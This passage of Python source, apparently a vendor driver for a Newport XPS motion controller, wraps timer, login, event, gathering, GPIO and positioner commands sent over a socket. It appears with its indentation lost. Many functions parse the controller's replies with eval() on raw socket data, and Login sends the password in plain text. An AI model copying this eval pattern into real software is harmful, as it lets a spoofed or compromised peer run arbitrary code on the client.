command = 'TimerGet(' + TimerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# TimerSet : Set a timer
def TimerSet (self, socketId, TimerName, FrequencyTicks):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TimerSet(' + TimerName + ',' + str(FrequencyTicks) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# Reboot : Reboot the controller
def Reboot (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'Reboot()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# Login : Log in
def Login (self, socketId, Name, Password):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'Login(' + Name + ',' + Password + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# CloseAllOtherSockets : Close all socket beside the one used to send this command
def CloseAllOtherSockets (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'CloseAllOtherSockets()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# HardwareDateAndTimeGet : Return hardware date and time
def HardwareDateAndTimeGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'HardwareDateAndTimeGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# HardwareDateAndTimeSet : Set hardware date and time
def HardwareDateAndTimeSet (self, socketId, DateAndTime):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'HardwareDateAndTimeSet(' + DateAndTime + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventAdd : ** OBSOLETE ** Add an event
def EventAdd (self, socketId, PositionerName, EventName, EventParameter, ActionName, ActionParameter1, ActionParameter2, ActionParameter3):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventAdd(' + PositionerName + ',' + EventName + ',' + EventParameter + ',' + ActionName + ',' + ActionParameter1 + ',' + ActionParameter2 + ',' + ActionParameter3 + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventGet : ** OBSOLETE ** Read events and actions list
def EventGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventGet(' + PositionerName + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventRemove : ** OBSOLETE ** Delete an event
def EventRemove (self, socketId, PositionerName, EventName, EventParameter):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventRemove(' + PositionerName + ',' + EventName + ',' + EventParameter + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventWait : ** OBSOLETE ** Wait an event
def EventWait (self, socketId, PositionerName, EventName, EventParameter):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventWait(' + PositionerName + ',' + EventName + ',' + EventParameter + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedConfigurationTriggerSet : Configure one or several events
def EventExtendedConfigurationTriggerSet (self, socketId, ExtendedEventName, EventParameter1, EventParameter2, EventParameter3, EventParameter4):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedConfigurationTriggerSet('
for i in range(len(ExtendedEventName)):
if (i > 0):
command += ','
command += ExtendedEventName[i] + ',' + EventParameter1[i] + ',' + EventParameter2[i] + ',' + EventParameter3[i] + ',' + EventParameter4[i]
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedConfigurationTriggerGet : Read the event configuration
def EventExtendedConfigurationTriggerGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedConfigurationTriggerGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedConfigurationActionSet : Configure one or several actions
def EventExtendedConfigurationActionSet (self, socketId, ExtendedActionName, ActionParameter1, ActionParameter2, ActionParameter3, ActionParameter4):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedConfigurationActionSet('
for i in range(len(ExtendedActionName)):
if (i > 0):
command += ','
command += ExtendedActionName[i] + ',' + ActionParameter1[i] + ',' + ActionParameter2[i] + ',' + ActionParameter3[i] + ',' + ActionParameter4[i]
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedConfigurationActionGet : Read the action configuration
def EventExtendedConfigurationActionGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedConfigurationActionGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedStart : Launch the last event and action configuration and return an ID
def EventExtendedStart (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedStart(int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# EventExtendedAllGet : Read all event and action configurations
def EventExtendedAllGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedAllGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedGet : Read the event and action configuration defined by ID
def EventExtendedGet (self, socketId, ID):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedGet(' + str(ID) + ',char *,char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedRemove : Remove the event and action configuration defined by ID
def EventExtendedRemove (self, socketId, ID):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedRemove(' + str(ID) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedWait : Wait events from the last event configuration
def EventExtendedWait (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedWait()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringConfigurationGet : Read different mnemonique type
def GatheringConfigurationGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringConfigurationGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringConfigurationSet : Configuration acquisition
def GatheringConfigurationSet (self, socketId, Type):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringConfigurationSet('
for i in range(len(Type)):
if (i > 0):
command += ','
command += Type[i]
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringCurrentNumberGet : Maximum number of samples and current number during acquisition
def GatheringCurrentNumberGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringCurrentNumberGet(int *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GatheringStopAndSave : Stop acquisition and save data
def GatheringStopAndSave (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringStopAndSave()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringDataAcquire : Acquire a configured data
def GatheringDataAcquire (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringDataAcquire()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringDataGet : Get a data line from gathering buffer
def GatheringDataGet (self, socketId, IndexPoint):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringDataGet(' + str(IndexPoint) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringDataMultipleLinesGet : Get multiple data lines from gathering buffer
def GatheringDataMultipleLinesGet (self, socketId, IndexPoint, NumberOfLines):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringDataMultipleLinesGet(' + str(IndexPoint) + ',' + str(NumberOfLines) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringReset : Empty the gathered data in memory to start new gathering from scratch
def GatheringReset (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringReset()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringRun : Start a new gathering
def GatheringRun (self, socketId, DataNumber, Divisor):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringRun(' + str(DataNumber) + ',' + str(Divisor) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringRunAppend : Re-start the stopped gathering to add new data
def GatheringRunAppend (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringRunAppend()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringStop : Stop the data gathering (without saving to file)
def GatheringStop (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringStop()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalConfigurationSet : Configuration acquisition
def GatheringExternalConfigurationSet (self, socketId, Type):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalConfigurationSet('
for i in range(len(Type)):
if (i > 0):
command += ','
command += Type[i]
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalConfigurationGet : Read different mnemonique type
def GatheringExternalConfigurationGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalConfigurationGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalCurrentNumberGet : Maximum number of samples and current number during acquisition
def GatheringExternalCurrentNumberGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalCurrentNumberGet(int *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GatheringExternalDataGet : Get a data line from external gathering buffer
def GatheringExternalDataGet (self, socketId, IndexPoint):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalDataGet(' + str(IndexPoint) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalStopAndSave : Stop acquisition and save data
def GatheringExternalStopAndSave (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalStopAndSave()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GlobalArrayGet : Get global array value
def GlobalArrayGet (self, socketId, Number):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GlobalArrayGet(' + str(Number) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GlobalArraySet : Set global array value
def GlobalArraySet (self, socketId, Number, ValueString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GlobalArraySet(' + str(Number) + ',' + ValueString + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# DoubleGlobalArrayGet : Get double global array value
def DoubleGlobalArrayGet (self, socketId, Number):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'DoubleGlobalArrayGet(' + str(Number) + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# DoubleGlobalArraySet : Set double global array value
def DoubleGlobalArraySet (self, socketId, Number, DoubleValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'DoubleGlobalArraySet(' + str(Number) + ',' + str(DoubleValue) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GPIOAnalogGet : Read analog input or analog output for one or few input
def GPIOAnalogGet (self, socketId, GPIOName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIOAnalogGet('
for i in range(len(GPIOName)):
if (i > 0):
command += ','
command += GPIOName[i] + ',' + 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(len(GPIOName)):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GPIOAnalogSet : Set analog output for one or few output
def GPIOAnalogSet (self, socketId, GPIOName, AnalogOutputValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIOAnalogSet('
for i in range(len(GPIOName)):
if (i > 0):
command += ','
command += GPIOName[i] + ',' + str(AnalogOutputValue[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GPIOAnalogGainGet : Read analog input gain (1, 2, 4 or 8) for one or few input
def GPIOAnalogGainGet (self, socketId, GPIOName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIOAnalogGainGet('
for i in range(len(GPIOName)):
if (i > 0):
command += ','
command += GPIOName[i] + ',' + 'int *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(len(GPIOName)):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GPIOAnalogGainSet : Set analog input gain (1, 2, 4 or 8) for one or few input
def GPIOAnalogGainSet (self, socketId, GPIOName, AnalogInputGainValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIOAnalogGainSet('
for i in range(len(GPIOName)):
if (i > 0):
command += ','
command += GPIOName[i] + ',' + str(AnalogInputGainValue[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GPIODigitalGet : Read digital output or digital input
def GPIODigitalGet (self, socketId, GPIOName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIODigitalGet(' + GPIOName + ',unsigned short *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# GPIODigitalSet : Set Digital Output for one or few output TTL
def GPIODigitalSet (self, socketId, GPIOName, Mask, DigitalOutputValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIODigitalSet(' + GPIOName + ',' + str(Mask) + ',' + str(DigitalOutputValue) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupAccelerationSetpointGet : Return setpoint accelerations
def GroupAccelerationSetpointGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupAccelerationSetpointGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupAnalogTrackingModeEnable : Enable Analog Tracking mode on selected group
def GroupAnalogTrackingModeEnable (self, socketId, GroupName, Type):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupAnalogTrackingModeEnable(' + GroupName + ',' + Type + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupAnalogTrackingModeDisable : Disable Analog Tracking mode on selected group
def GroupAnalogTrackingModeDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupAnalogTrackingModeDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupCorrectorOutputGet : Return corrector outputs
def GroupCorrectorOutputGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupCorrectorOutputGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupCurrentFollowingErrorGet : Return current following errors
def GroupCurrentFollowingErrorGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupCurrentFollowingErrorGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupHomeSearch : Start home search sequence
def GroupHomeSearch (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupHomeSearch(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupHomeSearchAndRelativeMove : Start home search sequence and execute a displacement
def GroupHomeSearchAndRelativeMove (self, socketId, GroupName, TargetDisplacement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupHomeSearchAndRelativeMove(' + GroupName + ','
for i in range(len(TargetDisplacement)):
if (i > 0):
command += ','
command += str(TargetDisplacement[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupInitialize : Start the initialization
def GroupInitialize (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupInitialize(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupInitializeWithEncoderCalibration : Start the initialization with encoder calibration
def GroupInitializeWithEncoderCalibration (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupInitializeWithEncoderCalibration(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupJogParametersSet : Modify Jog parameters on selected group and activate the continuous move
def GroupJogParametersSet (self, socketId, GroupName, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogParametersSet(' + GroupName + ','
for i in range(len(Velocity)):
if (i > 0):
command += ','
command += str(Velocity[i]) + ',' + str(Acceleration[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupJogParametersGet : Get Jog parameters on selected group
def GroupJogParametersGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogParametersGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *' + ',' + 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement*2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupJogCurrentGet : Get Jog current on selected group
def GroupJogCurrentGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogCurrentGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *' + ',' + 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement*2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupJogModeEnable : Enable Jog mode on selected group
def GroupJogModeEnable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogModeEnable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupJogModeDisable : Disable Jog mode on selected group
def GroupJogModeDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogModeDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupKill : Kill the group
def GroupKill (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupKill(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMoveAbort : Abort a move
def GroupMoveAbort (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMoveAbort(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMoveAbsolute : Do an absolute move
def GroupMoveAbsolute (self, socketId, GroupName, TargetPosition):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMoveAbsolute(' + GroupName + ','
for i in range(len(TargetPosition)):
if (i > 0):
command += ','
command += str(TargetPosition[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMoveRelative : Do a relative move
def GroupMoveRelative (self, socketId, GroupName, TargetDisplacement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMoveRelative(' + GroupName + ','
for i in range(len(TargetDisplacement)):
if (i > 0):
command += ','
command += str(TargetDisplacement[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMotionDisable : Set Motion disable on selected group
def GroupMotionDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMotionDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMotionEnable : Set Motion enable on selected group
def GroupMotionEnable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMotionEnable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupPositionCorrectedProfilerGet : Return corrected profiler positions
def GroupPositionCorrectedProfilerGet (self, socketId, GroupName, PositionX, PositionY):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionCorrectedProfilerGet(' + GroupName + ',' + str(PositionX) + ',' + str(PositionY) + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupPositionCurrentGet : Return current positions
def GroupPositionCurrentGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionCurrentGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupPositionPCORawEncoderGet : Return PCO raw encoder positions
def GroupPositionPCORawEncoderGet (self, socketId, GroupName, PositionX, PositionY):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionPCORawEncoderGet(' + GroupName + ',' + str(PositionX) + ',' + str(PositionY) + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupPositionSetpointGet : Return setpoint positions
def GroupPositionSetpointGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionSetpointGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupPositionTargetGet : Return target positions
def GroupPositionTargetGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionTargetGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupReferencingActionExecute : Execute an action in referencing mode
def GroupReferencingActionExecute (self, socketId, PositionerName, ReferencingAction, ReferencingSensor, ReferencingParameter):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupReferencingActionExecute(' + PositionerName + ',' + ReferencingAction + ',' + ReferencingSensor + ',' + str(ReferencingParameter) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupReferencingStart : Enter referencing mode
def GroupReferencingStart (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupReferencingStart(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupReferencingStop : Exit referencing mode
def GroupReferencingStop (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupReferencingStop(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupStatusGet : Return group status
def GroupStatusGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupStatusGet(' + GroupName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# GroupStatusStringGet : Return the group status string corresponding to the group status code
def GroupStatusStringGet (self, socketId, GroupStatusCode):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupStatusStringGet(' + str(GroupStatusCode) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupVelocityCurrentGet : Return current velocities
def GroupVelocityCurrentGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupVelocityCurrentGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# KillAll : Put all groups in 'Not initialized' state
def KillAll (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'KillAll()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerAnalogTrackingPositionParametersGet : Read dynamic parameters for one axe of a group for a future analog tracking position
def PositionerAnalogTrackingPositionParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAnalogTrackingPositionParametersGet(' + PositionerName + ',char *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerAnalogTrackingPositionParametersSet : Update dynamic parameters for one axe of a group for a future analog tracking position
def PositionerAnalogTrackingPositionParametersSet (self, socketId, PositionerName, GPIOName, Offset, Scale, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAnalogTrackingPositionParametersSet(' + PositionerName + ',' + GPIOName + ',' + str(Offset) + ',' + str(Scale) + ',' + str(Velocity) + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerAnalogTrackingVelocityParametersGet : Read dynamic parameters for one axe of a group for a future analog tracking velocity
def PositionerAnalogTrackingVelocityParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAnalogTrackingVelocityParametersGet(' + PositionerName + ',char *,double *,double *,double *,int *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(6):
